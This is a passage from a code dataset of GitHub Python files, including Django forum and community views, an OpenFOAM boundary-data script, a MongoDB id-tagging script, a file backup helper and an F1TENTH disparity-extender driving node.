o)\n\n\ndef getreply(request):\n id = request.POST.get('nid')\n reply_list = models.Reply.objects.filter(new__id=id).values('id','content','create_date','user__username')\n reply_list = list(reply_list)\n return HttpResponse(json.dumps(reply_list,cls=CJsonEncoder))\n\n\n@Filter(before, after)\ndef submitreply(request):\n ret = {'status':0, 'data':'', 'message':''}\n try:\n nid = request.POST.get('nid')\n data = request.POST.get('data')\n newObj = models.News.objects.get(id=nid)\n obj = models.Reply.objects.create(content=data,\n user=models.Admin.objects.get(id=request.session['current_user_id']),\n new=models.News.objects.get(id=nid))\n temp = newObj.reply_count + 1\n newObj.reply_count = temp\n newObj.save()\n ret['status'] = 1\n ret['data'] = {'content': obj.content, 'user_username':obj.user.username,\n 'create_date': obj.create_date.strftime('%Y-%m-%d %H:%M:%S'),\n 'reply_count':temp}\n except Exception as e:\n ret['message'] = e.args\n return HttpResponse(json.dumps(ret))\n\n\n@Filter(before, after)\ndef submitchat(request):\n ret = {'status': 0, 'data': '', 'message': ''}\n try:\n value = request.POST.get('data')\n chatObj = models.Chat.objects.create(content=value,\n user=models.Admin.objects.get(id=request.session['current_user_id']),\n )\n ret['status']=1\n ret['data']={\n 
'id': chatObj.id,\n 'username': chatObj.user.username,\n 'content':chatObj.content,\n 'create_date':chatObj.create_date.strftime('%Y-%m-%d %H:%M:%S')\n }\n except Exception as e:\n ret['message']=e.args\n return HttpResponse(json.dumps(ret))\n\n\ndef getchat(request):\n chatObj = models.Chat.objects.all().order_by('-id')[0:10].values('id', 'content', 'user__username', 'create_date')\n chatObj = list(chatObj)\n chatObj = json.dumps(chatObj, cls=CJsonEncoder)\n return HttpResponse(chatObj)\n\n\ndef getchat2(request):\n last_id = request.POST.get('last_id')\n chatObj = models.Chat.objects.filter(id__gt=last_id).values('id', 'content', 'user__username', 'create_date')\n chatObj = list(chatObj)\n chatObj = json.dumps(chatObj, cls=CJsonEncoder)\n return HttpResponse(chatObj)\n\n\n@Filter(before, after)\ndef username(request):\n data = {'status':1, 'user': ''}\n id = request.session['current_user_id']\n data['user'] = models.Admin.objects.get(id=id).username\n return HttpResponse(json.dumps(data))\n\n\ndef logout(request):\n try:\n del request.session['current_user_id']\n return HttpResponse(json.dumps(None))\n except Exception as e:\n return HttpResponse(json.dumps(e.args))\n\n\ndef dragon(request):\n return render_to_response('dragon.html')","repo_name":"dragonMar/BBS","sub_path":"app1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"30399814035","text":"import json\nfrom Products.Five.browser import BrowserView\nfrom Products.Five.browser.pagetemplatefile import ViewPageTemplateFile\nfrom zope.component import getMultiAdapter\nfrom cioppino.twothumbs import _\nfrom cioppino.twothumbs import rate\n\nclass LikeThisShizzleView(BrowserView):\n \"\"\" Update the like/unlike status of a product via AJAX \"\"\"\n\n def __call__(self, REQUEST, RESPONSE):\n form = self.request.form\n if form.get('form.lovinit', False):\n rate.loveIt(self.context)\n # vipod: additionally re-index a few more indexes\n self.context.reindexObject(idxs=['avg_ratings',\n 'total_down_ratings'])\n elif form.get('form.hatedit', False):\n rate.hateIt(self.context)\n # vipod: additionally re-index a few more indexes\n self.context.reindexObject(idxs=['avg_ratings',\n 'total_down_ratings'])\n else:\n return _(u\"We don't like ambiguity around here. \"\n \"Check yo self before you wreck yo self.\")\n\n tally = rate.getTally(self.context)\n RESPONSE.setHeader('Content-Type', 'application/javascript')\n return json.dumps(tally)\n","repo_name":"vnc-biz/vnccollab.theme","sub_path":"vnccollab/theme/browser/like.py","file_name":"like.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"2328235820","text":"from django.shortcuts import get_object_or_404,render,redirect,render_to_response\nfrom .models import Topic,TopicComment,LikeTopic,LikeTopicComment\nfrom .forms import TopicCreateForm,TopicCommentForm\nfrom django.http import JsonResponse\nfrom django.db.models import Count\nfrom django.core.paginator import Paginator\nfrom django.db.models import Q\n\n# Create your views here.\ndef community(request):\n topicform = TopicCreateForm()\n topics = Topic.objects.all()[:20]\n # 筛选出评论最多的十个话题\n # 首先根据TopicComment表中计算出每个话题的评论数,然后根据评论数进行排序,并取前十个\n hot_topics = Topic.objects.annotate(comment_count=Count(\"topiccomment__topic\")).order_by('-comment_count')[0:10]\n \n context = {}\n context['hot_topics'] = hot_topics\n context['topicform'] = topicform\n context['topics'] = topics\n return render(request,'community_home.html',context)\n\n\ndef topic_create(request):\n user = request.user\n topicform = TopicCreateForm()\n # print(user.username)\n topic_form = TopicCreateForm(request.POST, request.FILES)\n if topic_form.is_valid(): \n topic_title = topic_form.cleaned_data['topic_title']\n content = topic_form.cleaned_data['content']\n category = topic_form.cleaned_data['category']\n # 创建或者获取这条话题,并保存\n topic, created = Topic.objects.get_or_create(author=user, topic_title=topic_title, content=content, category=category)\n topic.save()\n # 首先根据TopicComment表中计算出每个话题的评论数,然后根据评论数进行排序,并取前十个\n hot_topics = Topic.objects.annotate(comment_count=Count(\"topiccomment__topic\")).order_by('-comment_count')[0:10]\n context = {}\n context['topic'] = topic\n context['topicform'] = topicform\n context['hot_topics'] = hot_topics\n return render(request, 'topic.html',context)\n\n\ndef topic_detail(request,id):\n topic = get_object_or_404(Topic,id=id)\n # 打开话题一次,就计算一个阅读数\n topic.read_num += 1\n topic.save()\n topicform = TopicCommentForm()\n topic_comments = TopicComment.objects.filter(topic=topic, parent=None)\n # 筛选出评论最多的十个话题\n # 首先根据TopicComment表中计算出每个话题的评论数,然后根据评论数进行排序,并取前十个\n hot_topics = Topic.objects.annotate(comment_count=Count(\"topiccomment__topic\")).order_by('-comment_count')[0:10]\n\n context = {}\n context['topic'] = topic\n context['topicform'] = topicform\n context['topic_comments'] = topic_comments\n context['hot_topics'] = hot_topics\n return render(request,'topic.html',context)\n\ndef topic_comment(request):\n user = request.user\n topiccomment_form = TopicCommentForm(request.POST, request.FILES)\n topicform = TopicCommentForm()\n context = {}\n if topiccomment_form.is_valid():\n topic_id = topiccomment_form.cleaned_data['topic_id']\n reply_comment_id = topiccomment_form.cleaned_data['reply_comment_id']\n content = topiccomment_form.cleaned_data['content']\n\n topic = Topic.objects.get(pk=topic_id)\n topiccomment = TopicComment()\n # 现在判断传入的这个数值是不是0,若是0,那它就是最顶级的评论,它的父级评论、根评论、回复人都是空的\n if reply_comment_id == 0:\n topiccomment.parent = None\n topiccomment.root = None\n topiccomment.reply_to = None\n # 如果现在传入的评论id不是0,那就看看根据这个id是不是能找到相应的评论\n #如果评论存在的话,那这个评论就是当前评论的父级评论,它的user就是被回复人,这条评论的根评论也是当前评论的根评论\n elif TopicComment.objects.filter(pk=reply_comment_id).exists():\n topiccomment.parent = TopicComment.objects.get(pk=reply_comment_id)\n # 如果根评论存在就是根评论,如果根评论不存在,那么父级评论就是他的根评论\n if topiccomment.parent.root:\n topiccomment.root = topiccomment.parent.root\n else:\n topiccomment.root = topiccomment.parent\n topiccomment.reply_to = topiccomment.parent.user\n topiccomment.user = user\n topiccomment.comment = content\n topiccomment.topic = topic\n if topiccomment.comment != '':\n 
topiccomment.save()\n # 保存之后跳转到话题的详情页\n return redirect(\"community:topic_detail\", id=topic_id)\n\n\ndef topic_comment_like(request):\n user = request.user\n topiccomment_id = request.GET.get('topiccomment_id')\n is_active = request.GET.get('is_active')\n topic_id = request.GET.get('topic_id')\n print(topiccomment_id)\n print(is_active)\n print(topic_id)\n \n data = {}\n # 如果返回的评论id为0,说明这是对原帖子的点赞\n if topiccomment_id == '0':\n topic = Topic.objects.get(pk=topic_id)\n if is_active == 'false':\n like_topic, created = LikeTopic.objects.get_or_create(topic=topic, user=user, like_status='1')\n data['status'] = 'SUCESS'\n else:\n like_topic = LikeTopic.objects.filter(topic=topic, user=user, like_status='1')\n if like_topic.exists():\n like_topic.delete()\n data['status'] = 'SUCESS'\n else:\n data['status'] = 'ERROR'\n # 如果返回的评论id不为0,那么就是对评论进行的点赞\n else:\n topiccomment = TopicComment.objects.get(pk=topiccomment_id)\n # 处理数据,如果点赞图标处于未点赞状态,那么就创造一条点赞记录\n if is_active == 'false':\n # 正在执行点赞动作,从数据库中获取或者创造一条点赞记录\n like_topiccomment, created = LikeTopicComment.objects.get_or_create(comment=topiccomment, user=user, like_status='1')\n data['status'] = 'SUCESS'\n \n else:\n # 点赞图标处于点赞状态,正在执行取消点赞动作,先获取这条点赞的记录\n like_topiccomment = LikeTopicComment.objects.filter(comment=topiccomment, user=user, like_status='1')\n # 如果这条点赞记录存在,那么删除这条记录\n if like_topiccomment.exists():\n like_topiccomment.delete()\n data['status'] = 'SUCESS'\n else:\n data['status'] = 'ERROR'\n # data['articlecomment_id'] = articlecomment_id\n return JsonResponse(data)\n\n \n# 对每个类型的话题进行分类展示,排序方法有按照你时间逆序、按照点击最多、按照评论最多\ndef topic_categry(request,category):\n topicform = TopicCreateForm()\n topics = Topic.objects.filter(category=category)\n\n if request.GET.get('order') == 'read_num': \n topics = Topic.objects.filter(category=category).order_by('-read_num')\n order = 'read_num'\n elif request.GET.get('order') == 'comment_num':\n topics = Topic.objects.filter(category=category).annotate(comment_count=Count(\"topiccomment__topic\")).order_by('-comment_count')\n order = 'comment_num'\n else:\n topics = Topic.objects.filter(category=category)\n order = 'created_time'\n\n # 对挑选出的分类文章进行分页\n paginator = Paginator(topics,10)\n page_num = request.GET.get('page',1)\n page_of_topics = paginator.get_page(page_num)\n #总页数\n num_pages = paginator.num_pages\n\n # 设定当前页左右显示页数\n around_count = 2\n # 获取当前页码、左侧页码、右侧页码\n current_page = page_of_topics.number\n\n left_has_more = False\n right_has_more = False\n if current_page <= around_count+2:\n left_pages = range(1,current_page)\n else:\n left_has_more = True\n left_pages = range(current_page-around_count,current_page)\n if current_page >= num_pages-around_count-1:\n right_pages = range(current_page+1,num_pages+1)\n else:\n right_has_more = True\n right_pages = range(current_page+1,current_page+around_count+1)\n\n hot_topics = Topic.objects.annotate(comment_count=Count(\"topiccomment__topic\")).order_by('-comment_count')[0:10]\n context = {}\n # 一共分了多少页\n context['page_of_topics'] = page_of_topics\n # context['page_range'] = paginator.page_range\n context['left_pages'] = left_pages\n context['current_page'] = current_page\n context['right_pages'] = right_pages\n context['left_has_more'] = left_has_more\n context['right_has_more'] = right_has_more\n context['num_pages'] = num_pages\n context['order'] = order\n context['hot_topics'] = hot_topics\n context['category'] = category\n context['topicform'] = topicform\n\n return render(request,'community_category.html',context)\n\ndef topic_search(request):\n topicform 
= TopicCreateForm()\n # 获取搜索关键词,并去除首尾空格\n search_words = request.GET.get('topic_search','').strip()\n # 如果有程序直接绕过前端输入了空字符串,那么就直接返回首页\n if len(search_words) == 0:\n return render(request,'community_home.html')\n else:\n condition = None\n for word in search_words.split(' '):\n if condition is None:\n condition = Q(topic_title__icontains=word) | Q(content__icontains=word)\n else:\n condition = condition | Q (topic_title__icontains=word) | Q(content__icontains=word)# ~:非 $:并 |:或 \n search_topics = Topic.objects.filter(condition).order_by('-created_time')\n # search_articles = Article.objects.filter(article_title__icontains=search_word)\n # 对搜索结果分页\n paginator = Paginator(search_topics,20)\n page_num = request.GET.get('page',1)\n page_of_topics = paginator.get_page(page_num)\n #总页数\n num_pages = paginator.num_pages\n\n # 设定当前页左右显示页数\n around_count = 2\n # 获取当前页码、左侧页码、右侧页码\n current_page = page_of_topics.number\n\n left_has_more = False\n right_has_more = False\n if current_page <= around_count+2:\n left_pages = range(1,current_page)\n else:\n left_has_more = True\n left_pages = range(current_page-around_count,current_page)\n if current_page >= num_pages-around_count-1:\n right_pages = range(current_page+1,num_pages+1)\n else:\n right_has_more = True\n right_pages = range(current_page+1,current_page+around_count+1)\n\n hot_topics = Topic.objects.annotate(comment_count=Count(\"topiccomment__topic\")).order_by('-comment_count')[0:10]\n\n context = {}\n context['search_words'] = search_words\n context['search_topics_count'] = search_topics.count()\n context['page_of_topics'] = page_of_topics\n # context['page_range'] = paginator.page_range\n context['left_pages'] = left_pages\n context['current_page'] = current_page\n context['right_pages'] = right_pages\n context['left_has_more'] = left_has_more\n context['right_has_more'] = right_has_more\n context['num_pages'] = num_pages\n context['hot_topics'] = hot_topics\n context['topicform'] = topicform\n return render(request,'community_search.html',context)\n\n\n\n\n\n\n","repo_name":"xiangjianjiangnan/mysite","sub_path":"community/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11527,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"13585197174","text":"#! /usr/bin/python\n# -*- coding: utf-8 -*-\nimport time, math\nfrom scipy.optimize import fsolve\nfrom scipy.integrate import quad\nfrom scipy.interpolate import griddata\n#from matplotlib.mlab import griddata\nimport numpy as np\n\n#=====================================================================================\n#\n#\tAuthor:\t\tSamuel Chang\n#\tDate:\t\tSep. 07. 2015\n#\tFunction:\tMatch the generated boundary data to 3D domain\n#\tUsage:\t\t1.python writeSetDiscreteFieldsDict.py\t\n#\n#\n#*************************************************************************************\n\nboundaryData = []\nheight_boundary = []\nu1 = []; u2 = []; u3 = []; T = []; k = []; epsilon = [];\nfile= open(\"../generateBoundary/boundaryData.dat\",\"r\")\nfor line in file:\n\tboundaryData.append(line.split(\"\t\"))\nfile.close()\n\nfor line in boundaryData:\n\theight_boundary.append(float(line[0]))\n\tu1.append(float(line[1]))\n\tu2.append(float(line[2]))\n\tu3.append(float(line[3]))\n\tT.append(float(line[4]))\n\tk.append(float(line[5]))\n\tepsilon.append(float(line[6]))\t\n\ninletPatchXYZ = []\nfile= open(\"../inletPatchCoordinate.dat\",\"r\")\nfor line in file:\n\tinletPatchXYZ.append(line.split(\"\t\"))\nfile.close()\ninletX = []; inletY = []; inletZ = []\nfor line in inletPatchXYZ:\n\tinletX.append(float(line[0]))\n\tinletY.append(float(line[1]))\n\tinletZ.append(float(line[2]))\n\n\nu1_patch = griddata(height_boundary, np.asarray(u1), inletZ, method='linear')\nu2_patch = griddata(height_boundary, np.asarray(u2), inletZ, method='linear')\nu3_patch = griddata(height_boundary, np.asarray(u3), inletZ, method='linear')\nT_patch = griddata(height_boundary, np.asarray(T), inletZ, method='linear')\nk_patch = griddata(height_boundary, np.asarray(k), inletZ, method='linear')\nepsilon_patch = griddata(height_boundary, np.asarray(epsilon), inletZ, method='linear')\n\n\n#-------------\twriting the interpolated data to setDiscreteFieldsDict\t---------------------#\n\n\nheader =[]\nfile= open(\"headers/setDiscreteFieldsDictHeader\",\"r\")\nfor line in file:\n\theader.append(line)\t\nfile.close()\n\nheaderU =[]\nfile= open(\"headers/setDiscreteFieldsDictPartU\",\"r\")\nfor line in file:\n\theaderU.append(line)\t\nfile.close()\n\nheaderk =[]\nfile= open(\"headers/setDiscreteFieldsDictPartk\",\"r\")\nfor line in file:\n\theaderk.append(line)\t\nfile.close()\n\nheaderT =[]\nfile= open(\"headers/setDiscreteFieldsDictPartT\",\"r\")\nfor line in file:\n\theaderT.append(line)\t\nfile.close()\n\nheaderEps =[]\nfile= open(\"headers/setDiscreteFieldsDictPartEps\",\"r\")\nfor line in file:\n\theaderEps.append(line)\t\nfile.close()\n\n#-----------------writing header------------------------#\nfile = open(\"../system/setDiscreteFieldsDict\",\"w\")\nfor line in header:\n file.write(line)\n \n#--------writing U\nfor line in headerU:\n file.write(line) \n\nfor i in range(0,len(inletZ)):\n\tfile.write(\"\t\t\t(\"+str(inletX[i])+\" \"+str(inletY[i])+\" \"+str(inletZ[i])+\" \"+str(u1_patch[i])+\" \"+str(u2_patch[i])+\" \"+str(u3_patch[i])+\")\"+\"\\n\")\nfile.write(\" ); \"+\"\\n\")\nfile.write(\"\t} \"+\"\\n\")\n\n#--------writing k\nfor line in headerk:\n file.write(line) \n\nfor i in range(0,len(inletZ)):\n\tfile.write(\"\t\t\t(\"+str(inletX[i])+\" \"+str(inletY[i])+\" \"+str(inletZ[i])+\" \"+str(k_patch[i])+\")\"+\"\\n\")\nfile.write(\" ); \"+\"\\n\")\nfile.write(\"\t} \"+\"\\n\")\n\n#--------writing T\nfor line in headerT:\n file.write(line) \n\nfor i in 
range(0,len(inletZ)):\n\tfile.write(\"\t\t\t(\"+str(inletX[i])+\" \"+str(inletY[i])+\" \"+str(inletZ[i])+\" \"+str(T_patch[i])+\")\"+\"\\n\")\nfile.write(\" ); \"+\"\\n\")\nfile.write(\"\t} \"+\"\\n\")\n\n#--------writing epsilon\nfor line in headerEps:\n file.write(line) \n\nfor i in range(0,len(inletZ)):\n\tfile.write(\"\t\t\t(\"+str(inletX[i])+\" \"+str(inletY[i])+\" \"+str(inletZ[i])+\" \"+str(epsilon_patch[i])+\")\"+\"\\n\")\nfile.write(\" ); \"+\"\\n\")\nfile.write(\"\t} \"+\"\\n\")\n\nfile.write(\"); \"+\"\\n\")\t\n","repo_name":"ChiYaoCh/boundaryGenerator","sub_path":"case/demo/utilities/writeSetDiscreteFieldsDict.py","file_name":"writeSetDiscreteFieldsDict.py","file_ext":"py","file_size_in_byte":3777,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}
+{"seq_id":"35434996468","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*- \n\nimport os\nimport re\nimport sys\n\nimport pymongo\n\n\ndirWithIds = sys.argv[1]\n\npazansMongo = pymongo.MongoClient(\"equal.cf\")\npazansDb = pazansMongo['pazans']\npazansCollection = pazansDb['pazans']\n\n# gotoMongo = pymongo.MongoClient(\"goto.reproducible.work\")\n# gotoDb = gotoMongo['vk']\n# gotoUserCollection = gotoDb['users']\nusersJsonFile = sys.argv[2]\n\nids = set()\n\nidsFile = sys.argv[3]\nif not os.path.isfile(idsFile):\n idsRegex = re.compile('\\\\\"_id\\\\\": (.+?),')\n with open(usersJsonFile, \"r\") as file_name:\n for line in file_name:\n groups = idsRegex.search(line)\n uid = int(groups.group(1))\n ids.add(uid)\n\n with open(idsFile, \"w\") as file_name:\n for uid in ids:\n file_name.write(str(uid) + \"\\n\")\nelse:\n with open(idsFile, \"r\") as f_ids:\n for line in f_ids:\n f_ids.add(int(line))\n\nfor file_name in os.listdir(dirWithIds):\n print(\"parsing {}\".format(file_name))\n\n with open(os.path.join(dirWithIds, file_name), \"r\") as f_out:\n for line in f_out:\n uid = int(line)\n if uid in ids:\n pazan = pazansCollection.find_one(uid)\n if pazan is None:\n pazansCollection.insert_one({\"_id\": uid, \"groups\": [file_name]})\n elif file_name not in pazan[\"groups\"]:\n pazan[\"groups\"].append(file_name)\n pazansCollection.update_one(\n {\"_id\": pazan[\"_id\"]},\n {\"$set\": {\"groups\": pazan[\"groups\"]}}\n )\n\n print(\"- done\")\n","repo_name":"AlekseyLobanov/gotohack","sub_path":"push-pazans-to-mongo.py","file_name":"push-pazans-to-mongo.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"2"}
+{"seq_id":"22473600084","text":"def palind(n):\r\n m, tmp = n, 0\r\n while m != 0:\r\n tmp = tmp * 10 + m % 10\r\n m //= 10\r\n return tmp == n\r\n\r\ndef check(n):\r\n cnt = 0\r\n while n != 0:\r\n r = n % 10\r\n if r % 2 != 0: return False\r\n cnt += 1\r\n n //= 10\r\n return cnt % 2 == 0\r\n\r\nif __name__ == '__main__':\r\n TC = int(input())\r\n for t in range(TC):\r\n n = int(input())\r\n for x in range(22, n):\r\n if check(x) and palind(x): print(x, end = ' ')\r\n print()","repo_name":"B20DCPT094/PYTHON_CODE_PTIT","sub_path":"PY01011-LIETKESODEP.py","file_name":"PY01011-LIETKESODEP.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"}
+{"seq_id":"23139226958","text":"\r\nimport os\r\n\r\n\r\ndef fileexists(p=\"path\"):\r\n return os.path.exists(p)\r\n\r\n\r\ndef getFilesNFolder(p=\"path\"):\r\n try:\r\n dateien=[]\r\n ordner=[]\r\n for found in os.listdir(p): \r\n if os.path.isdir(p+found):\r\n found=found.lower()\r\n ordner.append(found)\r\n #print(\"Ordner: \"+found)\r\n else:\r\n dateien.append(found)\r\n #print(\"Datei : \"+found)\r\n return dateien,ordner\r\n except:\r\n print(\"ERROR TRY OTHER DIRECTORY\")\r\n return\r\n\r\ndef getFilesNUnterordner(o=[],q=\"quelle\",e=\"Ebenen\"):\r\n o2=[]\r\n error=0\r\n errorl=[]\r\n dateien=[]\r\n dateienex=[]\r\n for i in range(0,len(o)):#o sind die Unterordner des quellenverzeichnis\r\n print(\"Unterordner: \"+o[i])\r\n if o[i][-1]!=\"\\\\\":\r\n o[i]+=\"\\\\\"\r\n try:\r\n d,o1=getFilesNFolder(q+o[i])#o1 sind die unterordner eines unterordners des quellenverzeichnisses\r\n except:\r\n print(\"ERROR: \"+q+o[i])\r\n errorl.append(\"coudn't read Directory \"+q+o[i])\r\n error+=1\r\n continue\r\n for j in range(0,len(d)):\r\n fn,fx=os.path.splitext(q+o[i]+d[j])\r\n dateien.append(fn)\r\n dateienex.append(fx) \r\n for j in range(0,len(o1)):\r\n o2.append(o[i]+o1[j])#o2 hat alle unterordner der unterordner des quellenverzeichnisses\r\n del d,o1\r\n if e!=0:\r\n if e==1:\r\n e=-1\r\n else:\r\n e-=1\r\n #print(\"en(o2): \"+str(len(o2)))\r\n #print(\"e: \"+str(e)) #works until here\r\n\r\n while(len(o2)!=0 and e==0 or len(o2)!=0 and e!=-1):\r\n o3=[]\r\n if e!=0:\r\n if e==1:\r\n e=-1\r\n else:\r\n e-=1\r\n for i in range(0,len(o2)):\r\n print(\"Unterordner: \"+o2[i])\r\n if o2[i][-1]!=\"\\\\\":\r\n o2[i]+=\"\\\\\"\r\n try:\r\n d,o1=getFilesNFolder(q+o2[i])#01 unterordner von o1\r\n except:\r\n print(\"ERROR: \"+q+o2[i])\r\n errorl.append(\"coudn't read Directory \"+q+o2[i])\r\n error+=1\r\n continue\r\n for j in range(0,len(d)):\r\n fn,fx=os.path.splitext(q+o2[i]+d[j])\r\n dateien.append(fn)\r\n dateienex.append(fx)\r\n for j in range(0,len(o1)):\r\n o3.append(o2[i]+o1[j])\r\n del d,o1\r\n o2=o3\r\n return dateien,dateienex,error,errorl\r\n\r\n\r\ndef setquelle():\r\n translation_table = dict.fromkeys(map(ord, '/'), '\\\\')#:->nichts\r\n quelle=input(\"Quellenverzeichnis: \")\r\n if not quelle:\r\n print(\"You typed nothing\")\r\n return None\r\n elif quelle[-1] != \"\\\\\":\r\n quelle+=\"\\\\\"\r\n \r\n if not os.path.isdir(quelle): #checkt ob das Quellenverzeichnis existiert\r\n print(\"Quellenverzeichnis \"+quelle+ \" konnte nicht gefunden werden\")\r\n return None\r\n else:\r\n #quelle=quelle.lower()\r\n quelle=quelle.translate(translation_table)\r\n return quelle\r\n\r\ndef setZiel():\r\n translation_table = dict.fromkeys(map(ord, '/'), '\\\\')#:->nichts\r\n default=os.path.dirname(os.path.realpath(__file__))+\"\\\\TARGETFOLDER\\\\\"\r\n ziel=input(\"Zielverzeichnis (ENTER = Standartverzeichnis): \")\r\n if not ziel:\r\n print(\"DEFAULT TARGETFOLDER\")\r\n ziel=default\r\n else:\r\n if ziel[-1]!=\"\\\\\":\r\n ziel=ziel+\"\\\\\"\r\n ziel=ziel.translate(translation_table)\r\n if not os.path.isdir(ziel):\r\n if ziel==default:\r\n os.makedirs(ziel)\r\n return ziel\r\n else:\r\n check=input(\"Das Zielverzeichnis: \"+ziel+\"\\nkonnte nicht gefunden werden\\nmöchten Sie es erstellen? 
(y/n): \")\r\n if check==\"y\" or check==\"Y\":\r\n try:\r\n os.makedirs(ziel)\r\n ziel=os.path.realpath(ziel)\r\n if ziel[-1]!=\"\\\\\":\r\n ziel=ziel+\"\\\\\"\r\n return ziel\r\n except:\r\n print(\"Das Zielverzeichnis \"+ziel+\"\\n konnte nicht erstellt werden\")\r\n return None\r\n else:\r\n ziel=os.path.realpath(ziel)\r\n if ziel[-1]!=\"\\\\\":\r\n ziel=ziel+\"\\\\\"\r\n return ziel\r\n\r\n\r\ndef setfextenion():\r\n endung=input(\"Dateiendung die du Filtern möchtest: \")\r\n if not endung:\r\n print(\"You typed nothing\")\r\n return None\r\n elif endung[0]!=\".\":\r\n endung=\".\"+endung\r\n return endung\r\n\r\ndef setfextenions(): \r\n endungen=[]\r\n endung=None\r\n while endung==None:\r\n endung=setfextenion()\r\n endungen.append(endung)\r\n check=input(\"Nach einer weiteren Dateiendung suchen? (y/n): \")\r\n while check==\"y\" or check==\"Y\":\r\n endung=None\r\n while endung==None:\r\n endung=setfextenion()\r\n endungen.append(endung)\r\n check=input(\"Nach einer weiteren Dateiendung suchen? (y/n): \")\r\n return endungen\r\n \r\ndef filenamecheck(f=\"datei\"):\r\n zwischen=f\r\n flen=len(f)\r\n j=-1\r\n while f[j]!=\")\"and j>-flen:\r\n j-=1\r\n if f[j]==\")\":\r\n i=j-2\r\n while f[i]!=\"(\" and i>-flen:\r\n i-=1\r\n if i==-flen:\r\n pass#ganz normal (1) anhängen\r\n else:\r\n #zahl rausholen!\r\n try: \r\n zahl=int(f[i+1:j])\r\n zahl+=1 \r\n f=zwischen[:i]+\"(\"+str(zahl)+\")\"+zwischen[j+1:]\r\n return f\r\n except:\r\n #print(\"hey\")\r\n pass\r\n fname,fex=os.path.splitext(zwischen)\r\n fname+=\"(1)\"\r\n f=fname+fex\r\n return f\r\n\r\ndef test():\r\n i=0\r\n p=\"a.mp3\"\r\n print(p)\r\n while i!=99999999:\r\n i+=1\r\n p=filenamecheck(p)\r\n print(p)\r\n\r\ndef getsize(p):\r\n return os.path.getsize(p)\r\n\r\nclass Count1:\r\n i=0\r\n\r\ndC= Count1()\r\ndef b_write(s,p,maxSize=0):\r\n #print(str(dC.i)+\" \"+p)\r\n dC.i+=1\r\n ok=False\r\n size=os.path.getsize(s)\r\n if maxSize!=0 and size > maxSize:\r\n print(\"FILE SIZE BIGGER MAX SIZE\")\r\n return False\r\n \r\n if os.path.isfile(p):\r\n #print(str(dC.i-1)+\" exists\") \r\n if size !=os.path.getsize(p):\r\n print(str(dC.i-1)+\" different size\") \r\n return True\r\n else:\r\n #print(\"IS fine: \"+p)\r\n return False\r\n else:\r\n #print(\"M1 does not exists!\")\r\n return True \r\n \r\n return ok\r\nif __name__=='__main__':\r\n\r\n test()\r\n os.system(\"pause\")\r\n","repo_name":"RomanDietenmeier/Python-Backup-Skript","sub_path":"module1.py","file_name":"module1.py","file_ext":"py","file_size_in_byte":6613,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"}
+{"seq_id":"31940433522","text":"#!/usr/bin/env python\nimport numpy as np\nimport sys\nimport rospy\nfrom std_msgs.msg import Bool\nfrom sensor_msgs.msg import LaserScan\nfrom ackermann_msgs.msg import AckermannDriveStamped\nfrom nav_msgs.msg import Odometry\nimport math\n\nclass DisparityExtender:\n\n CAR_WIDTH = 0.45\n # the min difference between adjacent LiDAR points for us to call them disparate\n DIFFERENCE_THRESHOLD = 2.\n STRAIGHTS_SPEED = 4.0\n CORNERS_SPEED = 3.0\n DRAG_SPEED = 4.0\n # the extra safety room we plan for along walls (as a percentage of car_width/2)\n SAFETY_PERCENTAGE = 900.\n def __init__(self):\n self.STEERING_SENSITIVITY = 3.\n self.COEFFICIENT = 2.5\n self.EXP_COEFFICIENT = 0.02\n self.X_POWER = 1.8\n self.QUADRANT_FACTOR = 3.5\n\n self.time = rospy.get_time()\n self.speed = 4. # Initial Speed?\n \n lidarscan_topic = '/scan'\n odom_topic = '/vesc/odom'\n drive_topic = '/vesc/low_level/ackermann_cmd_mux/input/teleop' # come back to me later\n \n self.odom_sub = rospy.Subscriber(odom_topic, Odometry,\n self.odom_cb, queue_size=1, buff_size=2**24)\n self.lidar_sub = rospy.Subscriber(lidarscan_topic, LaserScan,\n self.process_lidar, queue_size=1, buff_size=2**24)\n self.drive_pub = rospy.Publisher(drive_topic, AckermannDriveStamped,\n queue_size=1)\n\n def odom_cb(self, data):\n self.speed = data.twist.twist.linear.x\n\n def preprocess_lidar(self, ranges):\n \"\"\" Any preprocessing of the LiDAR data can be done in this function.\n Possible Improvements: smoothing of outliers in the data and placing\n a cap on the maximum distance a point can be.\n \"\"\"\n # remove quadrant of LiDAR directly behind us\n ranges = np.clip(ranges, 0, 16)\n eighth = int(len(ranges)/self.QUADRANT_FACTOR)\n\n return np.array(ranges[eighth:-eighth])\n\n\n def get_differences(self, ranges):\n \"\"\" Gets the absolute difference between adjacent elements in\n in the LiDAR data and returns them in an array.\n Possible Improvements: replace for loop with numpy array arithmetic\n \"\"\"\n differences = [0.] 
# set first element to 0\n for i in range(1, len(ranges)):\n differences.append(abs(ranges[i]-ranges[i-1]))\n return differences\n\n def get_disparities(self, differences, threshold):\n \"\"\" Gets the indexes of the LiDAR points that were greatly\n different to their adjacent point.\n Possible Improvements: replace for loop with numpy array arithmetic\n \"\"\"\n disparities = []\n for index, difference in enumerate(differences):\n if difference > threshold:\n disparities.append(index)\n return disparities\n\n def get_num_points_to_cover(self, dist, width):\n \"\"\" Returns the number of LiDAR points that correspond to a width at\n a given distance.\n We calculate the angle that would span the width at this distance,\n then convert this angle to the number of LiDAR points that\n span this angle.\n Current math for angle:\n sin(angle/2) = (w/2)/d) = w/2d\n angle/2 = sininv(w/2d)\n angle = 2sininv(w/2d)\n where w is the width to cover, and d is the distance to the close\n point.\n Possible Improvements: use a different method to calculate the angle\n \"\"\"\n angle = 1.5*np.arctan(width/(2*dist))\n num_points = int(np.ceil(angle / self.radians_per_point))\n return num_points\n\n def cover_points(self, num_points, start_idx, cover_right, ranges):\n \"\"\" 'covers' a 